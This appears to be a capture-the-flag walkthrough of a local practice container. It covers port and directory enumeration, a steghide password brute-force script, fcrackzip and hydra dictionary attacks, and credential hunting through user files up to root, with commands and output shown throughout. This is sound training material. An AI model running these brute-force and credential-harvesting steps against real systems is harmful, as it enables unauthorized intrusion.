HereBash
export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Web Server Enumeration
gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt
/scripts (Status: 301) [Size: 310] [--> http://$TARGET_IP/scripts/]
Investigating /scripts/
Directory
Further investigation of the /scripts/
directory revealed two elements:
put.php
: A PHP file.upload/
: An empty directory.
Accessing http://$TARGET_IP/scripts/put.php
directly via a web browser resulted in a 405 (Method Not Allowed) error. This is because the browser, by default, sends a GET request, and the file likely expects a different HTTP method.
- The name
put.php
strongly suggests that this file might be designed to handle HTTP PUT requests. - The presence of an empty
upload/
directory further reinforces the hypothesis that this setup could be intended for file uploads.
Confirm PUT Request Handling
curl -X PUT http://$TARGET_IP/scripts/put.php
Results
spongebob
spongebob could be a username but also something else... Like a directory name!
http://172.17.0.2/spongebob/upload has a JPG image. Maybe we have to make some Steganography?
Confirm PUT Request Handling
curl -X PUT http://$TARGET_IP/scripts/put.php
Results
spongebob
The response "spongebob" is ambiguous. It could represent a username, a directory name, or another resource identifier. Further investigation is warranted.
Exploring Potential "spongebob" Resource
Based on the response, we hypothesize that "spongebob" might represent a directory or endpoint. We can test this by directly accessing it via the web server.
Visiting http://$TARGET_IP/spongebob/
in a web browser reveals a directory listing.
Contents of /spongebob/
upload/
: A subdirectory containing a single image file,ohnorecallwin.jpg
.
The presence of an image file raises the possibility of steganography or other data-hiding techniques being employed.
Analyzing ohnorecallwin.jpg
We begin by downloading the ohnorecallwin.jpg
file for analysis.
wget http://$TARGET_IP/spongebob/upload/ohnorecallwin.jpg
Extracting Hidden Data with Steghide
We use steghide
to attempt data extraction. Since we don't have an initial password, we will iterate through a password list:
#!/bin/bash
while IFS= read -r password; do
# Suppress error messages by redirecting stderr to /dev/null
if steghide extract -sf ohnorecallwin.jpg -p "$password" 2>/dev/null; then
echo "Success with password: $password"
steghide extract -sf ohnorecallwin.jpg -p "$password" # Display output after success
break # Exit the loop after successful extraction
fi
done < /usr/share/wordlists/rockyou.txt
This script efficiently tries passwords from rockyou.txt
. The output reveals the correct password:
Success with password: spongebob
wrote extracted data to "seguro.zip".
Unzipping seguro.zip
The extracted seguro.zip
archive is password-protected. We employ fcrackzip
with rockyou.txt
for a dictionary attack:
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt seguro.zip
This yields the password for seguro.zip
:
PASSWORD FOUND!!!!: pw == chocolate
We then unzip the archive:
unzip seguro.zip
Archive: seguro.zip
[seguro.zip] secreto.txt password:
inflating: secreto.txt
Extracting the Hidden Message
The contents of secreto.txt
are:
cat secreto.txt
aprendemos
The extracted message "aprendemos" is likely a credential or part of a credential, possibly a password or keyword.
SSH Username Enumeration and Exploitation
Given that port 22 (SSH) is open and we have a potential password ("aprendemos"), we attempt to enumerate valid SSH usernames using hydra
.
Wordlist Selection:
For username enumeration, specialized wordlists are more effective than general password lists like rockyou.txt
. The seclists
project (https://github.com/danielmiessler/SecLists) offers a comprehensive collection of username lists under the Usernames
directory. In this case, we will use xato-net-10-million-usernames.txt
which could be found in SecLists.
Hydra Command for Username Enumeration:
hydra -L ~/Downloads/xato-net-10-million-usernames.txt -p aprendemos ssh://172.17.0.2 -f
Results:
[22][ssh] host: 172.17.0.2 login: rosa password: aprendemos
SSH Access and Initial Foothold
Using the discovered credentials, we establish an SSH connection:
ssh rosa@$TARGET_IP
Exploring Rosa's Home Directory:
Upon successful login, we navigate to an unusual directory:
cd ./-
Listing the directory contents reveals numerous files and directories following a pattern:
ls
buscaelpass1 buscaelpass14 buscaelpass19 buscaelpass23 buscaelpass28 buscaelpass32 buscaelpass37 buscaelpass41 buscaelpass46 buscaelpass50 buscaelpass55 buscaelpass6 buscaelpass64 buscaelpass8
buscaelpass10 buscaelpass15 buscaelpass2 buscaelpass24 buscaelpass29 buscaelpass33 buscaelpass38 buscaelpass42 buscaelpass47 buscaelpass51 buscaelpass56 buscaelpass60 buscaelpass65 buscaelpass9
buscaelpass11 buscaelpass16 buscaelpass20 buscaelpass25 buscaelpass3 buscaelpass34 buscaelpass39 buscaelpass43 buscaelpass48 buscaelpass52 buscaelpass57 buscaelpass61 buscaelpass66 creararch.sh
buscaelpass12 buscaelpass17 buscaelpass21 buscaelpass26 buscaelpass30 buscaelpass35 buscaelpass4 buscaelpass44 buscaelpass49 buscaelpass53 buscaelpass58 buscaelpass62 buscaelpass67
buscaelpass13 buscaelpass18 buscaelpass22 buscaelpass27 buscaelpass31 buscaelpass36 buscaelpass40 buscaelpass45 buscaelpass5 buscaelpass54 buscaelpass59 buscaelpass63 buscaelpass7
We also find a script named creararch.sh
.
Analyzing creararch.sh
:
cat creararch.sh
The script's contents are:
#!/bin/bash
# Buscamos directorios que empiezan con "busca"
for directorio in busca*; do
# Comprobamos si el directorio existe
if [ -d "$directorio" ]; then
# Crearmos 50 archivos y les metemos el contenido xx
for i in {1..50}; do
touch "$directorio/archivo$i" && echo "xxxxxx:xxxxxx" > "$directorio/archivo$i"
done
echo "Se crearon 50 archivos en $directorio"
else
echo "El directorio $directorio no existe"
fi
done
This script creates 50 files within each directory starting with "busca" and fills them with the string "xxxxxx:xxxxxx".
Identifying Files with Anomalous Content
We can infer that one of these files might contain credentials or valuable information. We devise a script to identify files that deviate from the standard 14-byte size established by creararch.sh
(or we could just filter out "xxxxxx:xxxxxx" using grep
):
#!/bin/bash
# Loop through all "buscaelpass" directories
for dir in buscaelpass*; do
# Loop through all files in each directory
for file in "$dir"/*; do
# Get the size of the file
size=$(stat -c %s "$file")
# Check if the size is different from 14 bytes
if [[ "$size" != "14" ]]; then
echo "Found file with different size: $file"
# Optionally, display the file content:
cat "$file"
fi
done
done
Found file with different size: buscaelpass33/archivo21
pedro:ell0c0
Privilege Escalation: pedro
su pedro
In pedro
's home directory, we found another directory named ...
. Inside that we found a file called .misecreto
.
cd .../
cat .misecreto
> Consegui el pass de juan y lo tengo escondido en algun lugar del sistema fuera de mi home.
Locating Juan's Password:
We search for files owned by pedro
outside his home directory, excluding the /proc
filesystem:
find / -type f -user pedro 2>/dev/null | grep -v "proc"
This command reveals several files, including a particularly interesting one:
/home/pedro/.../.misecreto
/home/pedro/.bashrc
/home/pedro/.bash_logout
/home/pedro/.profile
/home/pedro/.cache/motd.legal-displayed
/var/mail/.pass_juan
We examine the contents of /var/mail/.pass_juan
:
cat /var/mail/.pass_juan
ZWxwcmVzaW9uZXMK
The content "ZWxwcmVzaW9uZXMK" seems to be Base64 encoded. Actually we do not need to decode it.
su juan
Privilege Escalation: juan
We find an interesting file named .ordenes_nuevas
in juan
's home directory:
cat .ordenes_nuevas
> Hola soy tu patron y me canse y me fui a casa te dejo mi pass en un lugar a mano consiguelo y acaba el trabajo.
This message suggests that juan
's boss has left his password somewhere easily accessible.
We inspect juan
's .bashrc
file.
nano .bashrc
The file reveals an unusual alias:
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias pass='eljefe'
alias l='ls -CF'
The alias pass='eljefe'
is highly suspicious, suggesting that "eljefe" might be a password.
Privilege Escalation: root
We attempt to use the discovered password to escalate to root
:
su root
Password: eljefe
The password "eljefe" is accepted, granting us root privileges:
id
uid=0(root) gid=0(root) groups=0(root)